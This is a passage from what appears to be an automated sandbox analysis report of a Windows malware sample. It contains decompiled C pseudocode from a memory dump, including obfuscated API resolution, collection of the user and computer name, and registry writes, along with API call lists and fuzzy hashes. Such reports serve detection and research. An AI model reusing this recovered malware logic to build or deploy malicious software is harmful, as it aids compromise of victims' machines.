                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 358ebc06398a6090793cebae0c70477b4f307c2eaa2c9fe6e055bfca9851685c
                                                          • Instruction ID: 0b53dfa47d1ff217af8cfd69b116829c3705e5eb671371c9d71bdb363d73e41f
                                                          • Opcode Fuzzy Hash: 358ebc06398a6090793cebae0c70477b4f307c2eaa2c9fe6e055bfca9851685c
                                                          • Instruction Fuzzy Hash: EF417F32D00649BFDB11DFB8D844A9EB7BAEF88305F144425E914EB260EB71ED05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0463592D, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0463592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E0463A71F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x463d2a8; // 0x88a5a8
					_t1 = _t23 + 0x463e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x463d2a8; // 0x88a5a8
					_t2 = _t26 + 0x463e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E0463A734(_t54);
					} else {
						_t30 =  *0x463d2a8; // 0x88a5a8
						_t5 = _t30 + 0x463e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x463d2a8; // 0x88a5a8
							_t7 = _t33 + 0x463e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x463d2a8; // 0x88a5a8
								_t9 = _t36 + 0x463e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x463d2a8; // 0x88a5a8
									_t11 = _t39 + 0x463e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04636604(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                          0x0463593c
                                                          0x04635940
                                                          0x04635a02
                                                          0x04635946
                                                          0x04635946
                                                          0x0463594b
                                                          0x0463595e
                                                          0x04635960
                                                          0x04635965
                                                          0x0463596d
                                                          0x04635974
                                                          0x04635976
                                                          0x0463597b
                                                          0x046359fa
                                                          0x046359fb
                                                          0x0463597d
                                                          0x0463597d
                                                          0x04635982
                                                          0x0463598a
                                                          0x0463598c
                                                          0x04635991
                                                          0x00000000
                                                          0x04635993
                                                          0x04635993
                                                          0x04635998
                                                          0x046359a0
                                                          0x046359a2
                                                          0x046359a7
                                                          0x00000000
                                                          0x046359a9
                                                          0x046359a9
                                                          0x046359ae
                                                          0x046359b6
                                                          0x046359b8
                                                          0x046359bd
                                                          0x00000000
                                                          0x046359bf
                                                          0x046359bf
                                                          0x046359c4
                                                          0x046359cc
                                                          0x046359ce
                                                          0x046359d3
                                                          0x00000000
                                                          0x046359d5
                                                          0x046359db
                                                          0x046359e0
                                                          0x046359e7
                                                          0x046359ec
                                                          0x046359f1
                                                          0x00000000
                                                          0x046359f3
                                                          0x046359f6
                                                          0x046359f6
                                                          0x046359f1
                                                          0x046359d3
                                                          0x046359bd
                                                          0x046359a7
                                                          0x04635991
                                                          0x0463597b
                                                          0x04635a10

                                                          APIs
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04638EBD,?,00000001,?,?,00000000,00000000), ref: 04635952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04635974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0463598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 046359A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 046359B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 046359CC
                                                            • Part of subcall function 04636604: memset.NTDLL ref: 04636683
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: 9e267a4427c9ce69794ed8b74ad9ba8fd5032854971bbf60dd25031c0c60a312
                                                          • Instruction ID: 237850b803c15ab66309dd2427ff5d5befb70552f94794874b89d73fa4994fb4
                                                          • Opcode Fuzzy Hash: 9e267a4427c9ce69794ed8b74ad9ba8fd5032854971bbf60dd25031c0c60a312
                                                          • Instruction Fuzzy Hash: D9215EB56006CAAFD710DFA9C884D56B7FCEF24346B018126E946C7351FB74E9058B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0463853F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E0463853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x463d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04639070( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04636E98(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E0463A734(_a8);
						goto L29;
					}
					_t64 =  *0x463d278; // 0x4ec9a98
					_t16 = _t64 + 0xc; // 0x4ec9b66
					_t65 = E04639070(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d0463c0
						if(E046322F1(_t97,  *_t33, _t91, _a8,  *0x463d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x463d2a8; // 0x88a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x463ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x463e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E04636C38(_t69,  *0x463d334,  *0x463d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x463d2a8; // 0x88a5a8
									_t44 = _t71 + 0x463e846; // 0x74666f53
									_t73 = E04639070(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d0463c0
										E04635D7D( *_t47, _t91, _a8,  *0x463d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d0463c0
										E04635D7D( *_t49, _t91, _t99,  *0x463d330, _a16);
										E0463A734(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d0463c0
									E04635D7D( *_t40, _t91, _a8,  *0x463d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d0463c0
									E04635D7D( *_t43, _t91, _a8,  *0x463d330, _a16);
								}
								if( *_t101 != 0) {
									E0463A734(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d0463c0
					_t81 = E04638BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d0463c0
							E046322F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E0463A734(_t100);
						_t98 = _a16;
					}
					E0463A734(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E0463A749(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x463d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                          0x0463853f
                                                          0x04638548
                                                          0x0463854f
                                                          0x04638554
                                                          0x046385c1
                                                          0x046385c7
                                                          0x046385cc
                                                          0x046385d3
                                                          0x046385d8
                                                          0x046385dd
                                                          0x04638748
                                                          0x0463874f
                                                          0x0463874f
                                                          0x04638754
                                                          0x04638756
                                                          0x04638756
                                                          0x0463875f
                                                          0x0463875f
                                                          0x046385e3
                                                          0x046385ef
                                                          0x0463873e
                                                          0x04638741
                                                          0x00000000
                                                          0x04638741
                                                          0x046385f5
                                                          0x046385fa
                                                          0x046385fd
                                                          0x04638602
                                                          0x04638607
                                                          0x04638650
                                                          0x04638650
                                                          0x04638663
                                                          0x0463866d
                                                          0x04638673
                                                          0x0463867a
                                                          0x04638684
                                                          0x04638684
                                                          0x0463867c
                                                          0x0463867c
                                                          0x0463867c
                                                          0x0463867c
                                                          0x046386a6
                                                          0x046386ae
                                                          0x046386dc
                                                          0x046386e1
                                                          0x046386e8
                                                          0x046386ed
                                                          0x046386f1
                                                          0x04638723
                                                          0x046386f3
                                                          0x04638700
                                                          0x04638703
                                                          0x04638713
                                                          0x04638716
                                                          0x0463871c
                                                          0x0463871c
                                                          0x046386b0
                                                          0x046386bd
                                                          0x046386c0
                                                          0x046386d2
                                                          0x046386d5
                                                          0x046386d5
                                                          0x0463872d
                                                          0x04638739
                                                          0x0463872f
                                                          0x04638732
                                                          0x04638732
                                                          0x0463872d
                                                          0x046386a6
                                                          0x00000000
                                                          0x0463866d
                                                          0x04638616
                                                          0x04638619
                                                          0x04638620
                                                          0x04638626
                                                          0x04638629
                                                          0x0463862b
                                                          0x04638637
                                                          0x0463863a
                                                          0x0463863a
                                                          0x04638640
                                                          0x04638645
                                                          0x04638645
                                                          0x0463864b
                                                          0x00000000
                                                          0x0463864b
                                                          0x04638559
                                                          0x00000000
                                                          0x04638580
                                                          0x04638580
                                                          0x0463858c
                                                          0x0463859f
                                                          0x046385a5
                                                          0x046385ad
                                                          0x00000000
                                                          0x046385ad

                                                          APIs
                                                          • StrChrA.SHLWAPI(04633741,0000005F,00000000,00000000,00000104), ref: 04638572
                                                          • lstrcpy.KERNEL32(?,?), ref: 0463859F
                                                            • Part of subcall function 04639070: lstrlen.KERNEL32(?,00000000,04EC9A98,00000000,04638808,04EC9C76,?,?,?,?,?,63699BC3,00000005,0463D00C), ref: 04639077
                                                            • Part of subcall function 04639070: mbstowcs.NTDLL ref: 046390A0
                                                            • Part of subcall function 04639070: memset.NTDLL ref: 046390B2
                                                            • Part of subcall function 04635D7D: lstrlenW.KERNEL32(?,?,?,04638708,3D0463C0,80000002,04633741,0463A513,74666F53,4D4C4B48,0463A513,?,3D0463C0,80000002,04633741,?), ref: 04635DA2
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 046385C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: 1c940c14040eaab8225520bf7eba896eb931eb8b4bfd53b6d47f6d77d66c5514
                                                          • Instruction ID: c91054dfa92d927d0505fffaa54d0c333a784f4e309bd68aadbe09bdb6c5c324
                                                          • Opcode Fuzzy Hash: 1c940c14040eaab8225520bf7eba896eb931eb8b4bfd53b6d47f6d77d66c5514
                                                          • Instruction Fuzzy Hash: F4514A76100289AFEF21AF60DD40DEE77BAEB14346F104518F95157260F739ED15EB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0463A199, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0463A199() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E0463A71F(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E0463A734(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4631fd4
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                          0x0463a1a7
                                                          0x0463a1aa
                                                          0x0463a1ad
                                                          0x0463a1b3
                                                          0x0463a1b8
                                                          0x0463a1be
                                                          0x0463a1c6
                                                          0x0463a1c9
                                                          0x0463a1cf
                                                          0x0463a1d4
                                                          0x0463a1e1
                                                          0x0463a1ee
                                                          0x0463a1f2
                                                          0x0463a1f4
                                                          0x0463a1f8
                                                          0x0463a1fb
                                                          0x0463a20b
                                                          0x0463a25e
                                                          0x0463a25f
                                                          0x0463a20d
                                                          0x0463a212
                                                          0x0463a213
                                                          0x0463a218
                                                          0x0463a21b
                                                          0x0463a22e
                                                          0x00000000
                                                          0x0463a230
                                                          0x0463a233
                                                          0x0463a238
                                                          0x0463a246
                                                          0x0463a249
                                                          0x0463a24f
                                                          0x0463a254
                                                          0x00000000
                                                          0x0463a256
                                                          0x0463a256
                                                          0x0463a259
                                                          0x0463a259
                                                          0x0463a254
                                                          0x0463a22e
                                                          0x0463a264
                                                          0x0463a265
                                                          0x0463a1d4
                                                          0x0463a26b

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,04631FD2), ref: 0463A1AD
                                                          • GetComputerNameW.KERNEL32(00000000,04631FD2), ref: 0463A1C9
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • GetUserNameW.ADVAPI32(00000000,04631FD2), ref: 0463A203
                                                          • GetComputerNameW.KERNEL32(04631FD2,?), ref: 0463A226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04631FD2,00000000,04631FD4,00000000,00000000,?,?,04631FD2), ref: 0463A249
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 603338f9e3ea4f0249c9688f2b9e87648082e1216d91d910ecb2e915ecf3a2a2
                                                          • Instruction ID: 0b176022eaec4a491de018ae3d8f536aa9d018487ff47f97bb2b82043d40d40b
                                                          • Opcode Fuzzy Hash: 603338f9e3ea4f0249c9688f2b9e87648082e1216d91d910ecb2e915ecf3a2a2
                                                          • Instruction Fuzzy Hash: 55210A76A01248FFDB11DFE4C9848EEBBB8EF54305B1444AAE541E7244E735AB04DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04633DE9, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E04633DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04635AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E0463A81C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x463d128() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                          0x04633de9
                                                          0x04633df6
                                                          0x04633df8
                                                          0x04633e5b
                                                          0x00000000
                                                          0x04633e5b
                                                          0x04633e10
                                                          0x04633e17
                                                          0x04633e23
                                                          0x04633e28
                                                          0x04633e2a
                                                          0x04633e2c
                                                          0x04633e2e
                                                          0x04633e30
                                                          0x04633e32
                                                          0x04633e3e
                                                          0x04633e4e
                                                          0x00000000
                                                          0x04633e40
                                                          0x04633e40
                                                          0x04633e47
                                                          0x04633e54
                                                          0x04633e54
                                                          0x04633e54
                                                          0x04633e47
                                                          0x04633e3e
                                                          0x04633e59
                                                          0x00000000
                                                          0x00000000
                                                          0x04633e5f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,046367B8,?,?,00000000,00000000), ref: 04633E23
                                                          • ResetEvent.KERNEL32(?), ref: 04633E28
                                                          • GetLastError.KERNEL32 ref: 04633E40
                                                          • GetLastError.KERNEL32(?,?,00000102,046367B8,?,?,00000000,00000000), ref: 04633E5B
                                                            • Part of subcall function 04635AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04633E08,?,?,?,?,00000102,046367B8,?,?,00000000), ref: 04635AFD
                                                            • Part of subcall function 04635AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04633E08,?,?,?,?,00000102,046367B8,?), ref: 04635B5B
                                                            • Part of subcall function 04635AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 04635B6B
                                                          • SetEvent.KERNEL32(?), ref: 04633E4E
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: a55ca2c72d46ff7881b1024e86e1d3ffa638a58dfe984feffcf5e0fc35cfd920
                                                          • Instruction ID: 33f95dfca077b21abe35689ce7c6ca61c1f2cdf5ea5ff3b3704923740cb20d96
                                                          • Opcode Fuzzy Hash: a55ca2c72d46ff7881b1024e86e1d3ffa638a58dfe984feffcf5e0fc35cfd920
                                                          • Instruction Fuzzy Hash: 8A014F321042C1ABE7306B61DC44F1BB7A4EF5476AF104A26F951A12E0F771E845AB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04633E69, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04633E69(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x463d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x463d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x463d258 = _t6;
					 *0x463d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x463d254 = _t7;
					if(_t7 == 0) {
						 *0x463d254 =  *0x463d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                          0x04633e71
                                                          0x04633e77
                                                          0x04633e7e
                                                          0x00000000
                                                          0x04633ed8
                                                          0x04633e80
                                                          0x04633e88
                                                          0x04633e95
                                                          0x04633e95
                                                          0x04633ed5
                                                          0x00000000
                                                          0x04633ed5
                                                          0x04633e97
                                                          0x04633e97
                                                          0x04633e9c
                                                          0x04633eae
                                                          0x04633eb3
                                                          0x04633eb9
                                                          0x04633ebf
                                                          0x04633ec6
                                                          0x04633ec8
                                                          0x04633ec8
                                                          0x00000000
                                                          0x04633ecf
                                                          0x04633e91
                                                          0x00000000
                                                          0x00000000
                                                          0x04633e93
                                                          0x00000000

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0463131F,?,?,00000001,?,?,?,04634EF2,?), ref: 04633E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04634EF2,?), ref: 04633E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04634EF2,?), ref: 04633E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04634EF2,?), ref: 04633EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04634EF2,?), ref: 04633ED8
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: 797df01dc25679113245dbd7397e1957f861832ec1890ba3667d4db99c355a53
                                                          • Instruction ID: ded2f4ab5eae409c3c11abba352b891670b9b497c1890574cbef6f65020e73ba
                                                          • Opcode Fuzzy Hash: 797df01dc25679113245dbd7397e1957f861832ec1890ba3667d4db99c355a53
                                                          • Instruction Fuzzy Hash: 4BF08C716443C2AFE7208F34A909B197B62EB80703F001516FA02DA3D4F7B9E881CB14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04636F3A, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 46%
                                                          			E04636F3A(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x463d2a8; // 0x88a5a8
					_t5 = _t103 + 0x463e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x463c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x463d2a8; // 0x88a5a8
												_t28 = _t109 + 0x463e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x463d2a8; // 0x88a5a8
														_t33 = _t79 + 0x463e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                          0x04636f3f
                                                          0x04636f48
                                                          0x04636f49
                                                          0x04636f4d
                                                          0x04636f53
                                                          0x04636f59
                                                          0x04636f62
                                                          0x04636f68
                                                          0x04636f72
                                                          0x04636f74
                                                          0x04636f7a
                                                          0x04636f7f
                                                          0x04636f8a
                                                          0x04636f90
                                                          0x04636f95
                                                          0x046370b7
                                                          0x04636f9b
                                                          0x04636f9b
